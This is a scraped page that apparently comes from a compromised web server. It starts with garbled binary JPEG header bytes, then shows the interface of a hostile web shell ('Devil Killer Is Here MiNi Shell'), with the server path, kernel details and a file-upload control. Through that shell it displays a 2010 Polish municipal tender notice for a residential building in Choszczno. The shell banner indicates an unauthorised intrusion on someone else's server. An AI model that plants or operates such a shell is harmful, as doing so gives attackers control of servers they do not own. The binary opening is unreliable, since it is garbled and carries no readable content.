JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100707/178953-N-2010.html

<p class="kh_header"><b>Choszczno: Budowa wielorodzinnego budynku mieszkalnego z infrastrukturą towarzyszącą w miejscowości Choszczno wraz z zapewnieniem finansowania wykonanych prac do końca 2021 roku.</b><br>
<b>Numer ogłoszenia: 178953 - 2010; data zamieszczenia: 07.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Choszczno , ul. Wolności 24, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7659300, faks 095 7659306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.choszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielorodzinnego budynku mieszkalnego z infrastrukturą towarzyszącą w miejscowości Choszczno wraz z zapewnieniem finansowania wykonanych prac do końca 2021 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
1)	Przedmiotem zamówienia jest budowa wielorodzinnego budynku mieszkalnego z infrastrukturą towarzyszącą w miejscowości Choszczno wraz z zapewnieniem finansowania wykonanych prac do końca 2021 roku.
2)	Przedmiot zamówienia obejmuje wykonanie robót budowlanych wraz z dostawą i montażem wyposażenia oraz sprzedaż wierzytelności, jaką będzie miał Wykonawca w stosunku do Zamawiającego z tytułu ich wykonania, w terminie i na warunkach określonych w punkcie 2.3.

2. Roboty budowlane 

1)	Lokalizacja robót 
Budynek mieszkalny zlokalizowano miejscowości Choszczno przy ul. Staszica. na części działki nr 190/2, w jej północno-wschodnim narożniku. Przedmiotowa działka otoczona jest terenami zabudowy wielorodzinnej. Wjazd na teren nieruchomości przewidywany jest od wschodniego boku działki z ulicy dojazdowej. 

2)	Ogólna charakterystyka budynku 
Budynek mieszkalny zaprojektowano jako czterokondygnacyjny (parter + trzy piętra), niepodpiwniczony ze  stropodachem niewentylowanym. Projektowany budynek ma wymiary osiowe w rzucie - 23,2x14,9m.  Parametry budynku wynoszą: 
-powierzchnia netto 1217,06 m2
-powierzchnia zabudowy 375,20 m2
-kubatura 4628 m3
Do komunikacji na zewnątrz budynku zaprojektowano schody oraz podjazd dla osób niepełnosprawnych. Główne wejście do budynku wyposażono w żelbetowe zadaszenie powiązane konstrukcyjnie z wieńcem stropu nad parterem. Komunikację w budynku zapewnia centralnie zlokalizowana klatka schodowa oraz korytarz na każdej kondygnacji budynku zorientowany na osi północ-południe. Wszystkie mieszkania w budynku zlokalizowano od strony wschodniej i zachodniej. Budynek obejmuje łącznie 27 mieszkań w tym 11 mieszkań jednopokojowych i 16 dwupokojowych, pomieszczenie techniczne (kotłownia z pompą ciepła) oraz sień. Na parterze budynku o łącznej powierzchni netto 306,06m2 zaplanowano dwa mieszkania jednopokojowe o powierzchni netto 22,95m2 każde, cztery mieszkania dwupokojowe o powierzchni netto 44,64 m2 każde, pomieszczenie techniczne o powierzchni netto 23,48 m2 oraz sień o powierzchni netto 5,83 m2 m (korytarz 49,67 m2, schody 2,91m2).
Na każdym z trzech pięter występuje powtarzalny układ funkcjonalny pomieszczeń obejmujący trzy mieszkania jednopokojowe o powierzchni netto 22,95 m2 każde, 4 mieszkania dwupokojowe o powierzchni netto 44,64 m2 każde oraz komunikacja (schody+korytarz). Łączna powierzchnia  netto poszczególnych pięter wynosi I piętro 305,60 m2, II piętro  305,60 m2 i III piętro 299,80m2.
Na terenie działki zaprojektowano miejsca postojowe dla 27 samochodów osobowych, ciągi piesza oraz drogę  manewrową.

3)	Konstrukcja budynku 
Budynek ma konstrukcję tradycyjną, murowaną. Jako posadowienie głównej konstrukcji nośnej budynku zaprojektowano stopy i ławy fundamentowe wykonane z gęsto zbrojonego żelbetu. Ławy i stopy fundamentowe należy wykonać z betonu B20. Pod wszystkimi fundamentami należy wylać 10cm podlewkę z betonu B10. Ściany fundamentowe zaprojektowano o grubości 24cm z bloczków betonowych murowanych na zaprawie cementowej. Fundamenty i ściany fundamentowe izolowane przeciwwilgociowo. Ściany nośne wszystkich kondygnacji zaprojektowano jako murowane gr.24cm, z bloczków silikatowych na zaprawie murarskiej. W miejscach przejść i otworów zaprojektowano układ belek żelbetowych. W ścianach osłonowych i nośnych zaprojektowano nadproża prefabrykowane L19. 
Wszystkie stropy międzykondygnacyjne oraz stropodach zaprojektowano jako gęstożebrowe typu Teriva grubości 24cm łączone ze ścianami nośnymi za pośrednictwem wieńców. W stropodachu zaprojektowano układanie belek podwójnie. Płytę zadaszenia wejścia należy wykonać jako płytę żelbetową gr.15cm zbrojoną wspornikowo  górą prętami. W stropach międzykondygnacyjnych oraz stropodachu Do komunikacji między kondygnacjami przewidziano schody żelbetowe, monolityczne oparte na własnym fundamencie oraz belkach pośrednich. W projekcie przewidziano wykonanie ścian działowych z bloczków silikatowych grubości 12cm murowanych na zaprawie murarskiej.

4)	Wykończenie budynku
 Sufity i ściany wewnętrzne budynku należy wykończyć tynkiem cem.-wapiennym kl. III, wraz ze szpachlowaniem gładzią gipsową (opcja). Tynki wewnętrzne winny być gruntowane rzadką farbą i malowane dwukrotnie w kolorze białym, w pomieszczeniach mokrych należy stosować farby odporne na wilgoć. Ściany łazienek, w których przewidziano ułożenie płytek ceramicznych należy wykańczać tynkiem zatartym na ostro (w miejscach lokalizacji glazury). Docelowe wykończenie ścian łazienek - płytki ceramiczne do wys. 2 m., w natryskach płytki ceramiczne na pełną wysokość ścian. 
Posadzki w pomieszczeniach mieszkalnych mają być wykończone panelami HDF (pokoje+aneksy kuchenne) oraz płytkami ceramicznymi (komunikacja). Posadzki łazienek wodoodporne, przeciwślizgowa pokryte płytkami ceramicznymi płytki ceramiczne Posadzki  klatki schodowej, korytarzy na poszczególnych kondygnacjach  oraz pomieszczenia technicznego na parterze wykończone płytkami gres. Schody zewnętrzne oraz podjazd dla osób niepełnosprawnych wykończone płytkami gres mrozoodpornymi. Schody zewnętrzne płytki gres, antypoślizgowe na krawędziach zabezpieczenie przeciwpoślizgowe. Podjazd dla osób niepełnosprawnych wykończyć płytkami gresowymi ryflowanymi. Powierzchnie pochyłe od płaskich należy odróżnić kolorem posadzki. Podjazd zaopatrzony zostanie w stalowe poręcze z 2 pochwytami i odbojnikiem. Stolarka okienna zewnętrzna wykonana z PCV w kolorze białym z szybami zespolonymi o współczynniku min. U=1,0W/m2. Stolarka drzwiowa wewnętrzna. - drzwi drewnopodobne okleinowane, przylgowe. W korytarzu parteru stolarka aluminiowa lub PCV. Stolarka drzwiowa zewnętrzna (drzwi wejściowe do budynku) z aluminium lub PCV z wypełnieniami z szyby zespolonej bezpiecznej P2. Ściany zewnętrzne budynku ocieplone styropianem FS 20 gr 15 cm i wykończone tynkiem cienkowarstwowym, parapety 
zewnętrzne z blachy cynkowej powlekanej Obróbki blacharskie należy wykonać z blachy 
cynkowo-tytanowej gr. 0,7 mm, na połaciach dachowych, obróbki widoczne z blachy 
powlekanej PCV - kolor biały. Rynny i rury spustowe zaprojektowano jako stalowe stalowe ocynkowane, (średnice i rodzaj wg projektu wod-kan). Dach płaski kryty wielowarstwowo papą układaną na zakład. Na zewnątrz budynku przewiduje się wykonanie naziemnych miejsc postojowych dla 27 pojazdów, chodników oraz drogi manewrowej wykończonych kostką betonową.    

5)	Wyposażenie budynku
Budynek zostanie wyposażony w 
a)	instalacje niskonapięciowe w tym:  
-instalacja telefoniczna - przyłącze do budynku i pion kablowy w szachcie instalacyjnym  wykonuje wybrany operator dostawca usług telekomunikacyjnych, przełącznicę budynku zlokalizowaną na parterze (wydzielona szafka) i przełącznice piętrowe (puszki kondygnacyjne zakończeń kablowych)  należy wykonać w szachcie instalacyjnym. Rozprowadzenie linii telefonicznych do  mieszkań  3 parowym przewodem  telefonicznym YTKSY układanym w rurce Peschla pod tynkiem, zakończenie linii w mieszkaniach w jednym gnieździe abonenckim zlokalizowanym  przedpokoju
-instalacja domofonowa obejmuje panel wywołania przed wejściem do budynku, rozdzielacz magistrali zintegrowany z zasilaczem zabudowany w tablicy administracyjnej, pion komunikacyjny - 2 żyłowy, prowadzony w szachcie instalacyjnym, unifony w mieszkaniach
-instalacja RTV SAT obejmuje: antenę zbiorczą RTV i SAT wraz z masztem na dachu, wzmacniacz tv zlokalizowany na podeście klatki schodowej na 3 piętrze, rozgałęźniki piętrowe, pion dystrybucyjny prowadzony  w szachcie instalacyjnym,  okablowanie abonenckie (przewód WDXek 75/RVS 22 pt od złącza teletechnicznego instalacji TV do lokalu) oraz gniazda abonenckie - w mieszkaniach
b)	instalację elektryczną - budynek będzie zasilany ze złącza kablowego usytuowanego w linii ogrodzenia działki. W zakresie zadań Wykonawcy jest budowa wewnętrznej linii zasilającej w relacji złącze kablowe - tablica główna budynku. Tablicę główną w obudowie wnękowej zaprojektowano w korytarzu wewnętrznym na parterze budynku. Tablica zawiera zabezpieczenia linii wyprowadzonych w kierunku tablic TL, TA oraz aparaty ochrony przeciwprzepięciowej. Tablice TL i TA usytuowane w korytarzu na każdej kondygnacji budynku. Linie pionowe zasilania mieszkań i obwodów administracyjnych należy ułożyć w szachcie instalacji elektrycznych wyposażonych w koryta kablowe. Obwody administracyjne obejmują:
-oświetlenie korytarzy na poszczególnych kondygnacjach
-oświetlenie zewnętrzne ( oprawy na budynku)
-gniazdo wtyczkowe 230V w tablicy TA (na szynie TH)
-kotłownia
-pompa ciepła
-zasilanie centralki domofonu
-zasilanie dla potrzeb instalacji tv
Instalacje mieszkaniowe obejmują: 
-tablica wnękowa na 12 modułów usytuowana w korytarzu w rejonie drzwi wejściowych 
-oświetlenie
-gniazdka wtyczkowe w aneksie kuchennym
-gniazdko wtyczkowe pralka
-gniazdka wtyczkowe w pokoju (pokojach)
kuchnia elektryczna
Instalację należy wykonać: 
-w zakresie oprzewodowania - przewody kabelkowe, podtynkowe typu YDY o napięciu znamionowym instalacji 450/750V kładzione w tynku 
-w zakresie osprzętu -  pokoje, kuchnia - IP 20,  pomieszczenia sanitarne - IP 44
c)	Instalację wod.- kan:
-ścieki sanitarne z budynku odprowadzone będą do sieci kanalizacji sanitarnej DN200 przebiegającej w ulicy
-Ścieki deszczowe z budynku odprowadzone będą do sieci kanalizacji deszczowej DN400 przebiegającej w ulicy 
d)	instalację CO - instalację zaprojektowano w systemie dwururowym wodnym pompowym  z rozdziałem dolnym z zasilaniem z własnej ciepłowni zlokalizowanej w pomieszczeniu technicznym na parterze budynku. Główne poziomy c.o. prowadzić w izolacji w kanale wykonanym pod posadzką parteru w komunikacji. Piony prowadzić w szachtach. Do wykonania poziomej i pionowej instalacji c.o. należy zastosować rury miedziane sztywne. Rury prowadzić w otulinie izolacyjnej THERMAFLEX g = 0,03 m.
e)	ciepłownię - do instalacji c.o. i c.w. projektuje się system oparty na odnawialnym źródle ciepła, tj. wymienniku gruntowym pionowym (odwiertach). Dobrano system na moc cieplną 55 kW.
Na wyposażeniu mieszkań znajdą się: 
a)	w części aneksu kuchennego zlewozmywak wraz z baterią, syfonem i szafką oraz kuchnia elektryczna czteropalnikowa z piekarnikiem   
b)	w łazience : brodzik z syfonem, kabiną prysznicową i baterią , umywalka z syfonem i  baterią, WC kompakt, podejście wodne i odpływowe do pralki  

Szczegółowy zakres wykonania robót zawiera dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót, które stanowią załączniki do niniejszej specyfikacji


3. Wymagania dotyczące zapewnienia finansowania wykonanych prac do 2021 roku.
1)	W zakresie obejmującym zapewnienie finansowania do końca 2021 roku  Wykonawca zapewni możliwość zapłaty przez Zamawiającego kwoty wynikającej z zaakceptowanych przez  Zamawiającego faktur przejściowych i faktury końcowej obejmujących wartość przedmiotu zamówienia 	wraz z należnym podatkiem VAT na podstawie cesji wierzytelności na rzecz banku na zasadach określonych w ppkt 2) - 4).
2)	Wykonawca zobowiązuje się, że najpóźniej do czasu rozpoczęcia robót, (przejęcia placu budowy), zawrze z 	bankiem działającym na podstawie i w oparciu o przepisy ustawy z dnia 29 sierpnia 	1997r. Prawo bankowe (ze zm.) umowę sprzedaży wierzytelności wynikającej z 	umowy zawartej pomiędzy Wykonawcą i Zamawiającym  stanowiącej równowartość wykonanych robót, dostawy i montażu wyposażenia (Wynagrodzenie Ryczałtowe) wraz z należnym podatkiem VAT, a bank wierzytelność tę nabędzie.
3)	Umowa wykupu wierzytelności, o jakiej mowa w ppkt 2) zawierać będzie 	zobowiązanie banku do wykupu wierzytelności określające maksymalną wysokość, 	zasady i warunki spłaty tych wierzytelności oraz zapewni Wykonawcy uzyskanie z banku zapłaty kwoty odpowiadającej kwotom z wystawianych faktur przejściowych i faktury końcowej w nieprzekraczalnym terminie 30 dni od daty wystawienia i zaakceptowania faktur przez Zamawiającego.
4)	Wykonawca zobowiązuje się do spełnienia wszelkich warunków określonych przez 	bank w zawartej umowie wykupu wierzytelności tak, by terminy zapłaty określone w ppkt .3) mogły być dotrzymane.
5)	Spłata wykupionej przez bank wierzytelności realizowana będzie przez Zamawiającego w wartości wynikającej z wystawionych i przedstawionych w banku 	do wykupu faktur w 120 równych miesięcznych  ratach kapitałowych począwszy od dnia  31 stycznia 2012 r. do dnia 31 grudnia 2021 r.
6)	Od kwoty aktualnego salda wierzytelności (ustalonego w oparciu o zaakceptowane 	przez Zamawiającego faktury z uwzględnieniem dokonanych przez Zamawiającego spłat kapitału) bank 	pobierze odsetki naliczane w stosunku rocznym (dla roku równego 365/366 dni i 	rzeczywistej liczby dni w każdym miesiącu) wg zmiennej stopy procentowej 	ustalonej na bazie WIBOR 1M i stałej marży banku, w wysokości podanej w ofercie Wykonawcy w punktach procentowych w stosunku rocznym.
7)	Zmiana stawki WIBOR 1 M dokonywana będzie na zasadach i w terminach   obowiązujących w banku, który nabędzie wierzytelność.
8)	Spłata odsetek, o jakich mowa w ppkt 6) dokonywana będzie przez Zamawiającego w okresach miesięcznych  w terminach zgodnych z terminem spłaty 	rat kapitałowych, 
     a w okresie karencji na ostatni dzień miesiąca. Pierwsze odsetki od wykupionych 
     wierzytelności płatne będą na koniec miesiąca w którym wykupiona zostanie przez 
      bank pierwsza faktura zaakceptowana przez Zamawiającego. 
9)	Bank najpóźniej na 7 dni roboczych przed terminem spłaty raty kapitałowo - 	odsetkowej będzie przekazywał Zamawiającemu (dłużnikowi) informację o wysokości spłaty wierzytelności (rata kapitałowa i odsetki).
10)	 W przypadku niedotrzymania przez Zamawiającego (dłużnika) terminu zapłaty, o 	jakim mowa w ppkt 5) i 8) bank ma prawo do naliczania odsetek od salda zadłużenia przeterminowanego w wysokości i na zasadach obowiązujących w banku.
11)	 Zamawiający zobowiązuje się, że uzna dług związany ze sprzedażą wierzytelności do 	wysokości zafakturowanych robót (na podstawie zaakceptowanych przez Zamawiającego faktur przejściowych i faktury końcowej) i do dokonania na rzecz         banku 	zapłaty wynikającego z  nich zobowiązania w równych 120 miesięcznych         ratach 	kapitałowych  powiększonych o odsetki należne bankowi, zgodnie z treścią ppkt         od 1) do 9)
12)	 Na żądanie banku dokonującego wykupu wierzytelności Zamawiający każdorazowo:
a)	 przedstawi kartę wzorów podpisów osób upoważnionych do reprezentowania Zamawiającego i akceptacji faktur, 
b)	 potwierdzi wystawione przez bank zawiadomienie o przelewie wierzytelności z przedmiotowej umowy podpisanej przez Zamawiającego z Wykonawcą, 
c)	 złoży oświadczenie o zaakceptowaniu harmonogramu spłaty wierzytelności 	określonego w umowie sprzedaży wierzytelności podpisanej przez 	Wykonawcę z bankiem oraz o przyjęciu do wiadomości i stosowania postanowień zawartych w tej umowie 
d) udostępni dane pozwalające na ocenę jego sytuacji finansowej.
13)	Spłata przez Zamawiającego wierzytelności w kwotach i terminach wynikających z postanowień umowy sprzedaży wierzytelności podpisanej przez Wykonawcę 	 z bankiem zaspokoi w całości roszczenia Wykonawcy w stosunku do Zamawiającego.
14)	Zamawiający będzie miał możliwość dokonania wcześniejszej spłaty części lub całej 	kwoty zadłużenia przed terminem ostatecznej spłaty, a odsetki będą pobierane wyłącznie od faktycznego salda zadłużenia  Zamawiającego w  okresie odsetkowym.
15)	Skrócenie spłaty zobowiązania nie spowoduje naliczania dodatkowych opłat lub prowizji banku.
16)	Jeżeli termin spłaty odsetek lub kapitału przypadać będzie na dzień ustawowo wolny od pracy, to termin spłaty ulegnie przesunięciu na następny dzień roboczy.
17)	Zamawiający wyraża zgodę na wykup wierzytelności przez bank finansujący Wykonawcę. 
18)	Zamawiający zastrzega sobie nienaruszalność poniższych zasad spłaty wierzytelności przez cały okres spłaty:
	a) bank nie może żądać od Zamawiającego spłaty zobowiązania przed umówionym              okresem spłaty,
b) spłata zobowiązania przez cały okres spłaty będzie realizowana na warunkach określonych w ofercie Wykonawcy,
c) wprowadzenie jakiejkolwiek zmiany systemu spłaty przez bank finansujący   Wykonawcę, bez zgody Zamawiającego nie będzie obowiązujące.


4. Wykonanie robót budowlanych.
4.1.	Roboty budowlane należy wykonać zgodnie z załączoną dokumentacją projektową (przez którą w niniejszym postępowaniu należy rozumieć projekt budowlany, projekty wykonawcze ), specyfikacją techniczna wykonania i odbioru robót, wytycznymi określonymi w SIWZ, z wiedzą, sztuką budowlaną, przepisami BHP, ppoż., oraz poleceniami Inspektora nadzoru inwestorskiego.
4.2.	Wykonawca po wykonaniu robót przygotuje wszelkie wymagane dokumenty dla Zamawiającego na odbiór końcowy zadania, w tym dokumentację powykonawczą jeżeli w toku wykonywania robót konieczne były zmiany dokumentacji projektowej oraz niezbędne opinie i uzgodnienia do złożenia ich do organu nadzoru budowlanego w celu uzyskania decyzji pozwolenia na użytkowanie. Natomiast czynności przed tym organem, związane z uzyskaniem przedmiotowej decyzji, będą już podejmowane przez Zamawiającego we własnym zakresie.
4.3.	Wykonanie robót będzie się uważać za zakończone - odbiór końcowy, jeżeli odbiór nastąpi bez usterek.
4.4.	Do wykonania zamówienia wykonawca zobowiązany jest użyć materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych odpowiadających właściwościom materiałów przyjętych w projekcie.
4.5.	Użyte w dokumentacji projektowej nazwy materiałów i urządzeń nie są obowiązujące i należy je traktować, jako propozycje projektanta. Wykonawca może zastosować materiały i urządzenia równoważne o parametrach estetyczno -  techniczno - użytkowych odpowiadających co najmniej parametrom materiałów i urządzeń zaproponowanych w projektach. 
4.6.	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie/wbudowanie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości).
4.7.	Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy oraz o innych parametrach niż określone w projekcie. 
4.8.	Wyroby budowlane użyte do wykonania robót muszą odpowiadać wymaganiom określonym w obowiązujących przepisach :
a)	Ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881) cyt.: 
Art. 4. Wyrób budowlany może być wprowadzony do obrotu, jeżeli nadaje się do stosowania przy wykonywaniu robót budowlanych, w zakresie odpowiadającym jego właściwościom użytkowym i przeznaczeniu, to jest ma właściwości użytkowe umożliwiające prawidłowo zaprojektowanym i wykonanym obiektom budowlanym, w których ma być zastosowany w sposób trwały, spełnienie wymagań podstawowych. 
Art. 5. Wyrób budowlany nadaje się do stosowania przy wykonywaniu robót budowlanych, jeżeli jest oznakowany CE, co oznacza, że dokonano oceny jego zgodności z normą zharmonizowaną albo europejską aprobatą techniczną bądź krajową specyfikacją techniczną państwa członkowskiego Unii Europejskiej lub Europejskiego Obszaru Gospodarczego, uznaną przez Komisję Europejską za zgodną z wymaganiami podstawowymi, albo umieszczony w określonym przez Komisję Europejską wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację zgodności z uznanymi regułami sztuki budowlanej, albo oznakowany, z zastrzeżeniem ust. 4, znakiem budowlanym, którego wzór określa załącznik nr 1 do niniejszej ustawy. Oznakowanie CE wyrobu budowlanego, który nie stwarza szczególnego zagrożenia dla zdrowia lub bezpieczeństwa oraz nie odpowiada lub odpowiada częściowo specyfikacjom technicznym, o których mowa w ust. 1 pkt 1, jest także dopuszczalne, wyłącznie po dokonaniu stosownej oceny zgodności.
b)	Ustawie z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. Nr 156, poz. 1118 z późn. zm.) cyt. : 
Art. 10. Wyroby wytworzone w celu zastosowania w obiekcie budowlanym w sposób trwały, o właściwościach użytkowych, umożliwiających prawidłowo zaprojektowanym i wykonanym obiektom budowlanym spełnienie wymagań podstawowych, o których mowa w art. 5 ust. 1 pkt 1, można stosować przy wykonywaniu robót budowlanych wyłącznie, jeżeli wyroby te zostały wprowadzone do obrotu zgodnie z przepisami odrębnymi.
4.9.	Wykonawca wykona i przygotuje oraz złoży w formie trwale spiętej wszelkie dokumenty za wykonany przedmiot zamówienia, a zwłaszcza :
a)	certyfikaty zgodności wykonania z normami jw. pkt. 6,
b)	instrukcje (w języku polskim) użytkowania zamontowanych urządzeń,
c)	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich dostarczonych, zamontowanych urządzeń
d)	protokoły z badania materiałów i urządzeń,
e)	zmiany w projekcie budowlanym i rysunki ze zmianami naniesionymi w trakcie realizacji zadania wraz z uzyskanymi decyzjami odpowiednich organów
f)	inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, a odnoszące się do jego realizacji,.
4.10.	Wykonawca zabezpieczy składowane tymczasowo na placu budowy  materiały i urządzenia - do czasu ich wbudowania - przed zniszczeniem, uszkodzeniem albo utratą jakości, właściwości lub parametrów, oraz udostępni do kontroli przez Inspektora nadzoru.
4.11.	 Wykonawca może powierzyć wykonywanie robót budowlanych podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.26.23.11-4, 45.26.23.00-4, 45.26.20.00-0, 45.26.20.00-1, 45.26.10.00-4, 45.26.25.00-6, 45.32.00.00-6, 45.32.10.00-3, 45.26.12.10-9, 45.26.13.20-3, 45.41.00.00-4, 45.43.10.00-7, 45.43.20.00-4, 45.43.21.10-8, 45.42.10.00-4, 45.42.11.00-5, 93.95.00.00-2, 45.44.20.00-7, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2021.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium ustala się w kwocie 40 000,00 złotych
        słownie : czterdzieści tysięcy złotych.

 
2.	Wadium należy wnosić na zasadach określonych w art. 45 ustawy Pzp. 
3.	Wadium w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: Bank  GBS o/Choszczno Nr rachunku 40 8359 0005 0028 9098 2000 0003 z dopiskiem   
na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej -  
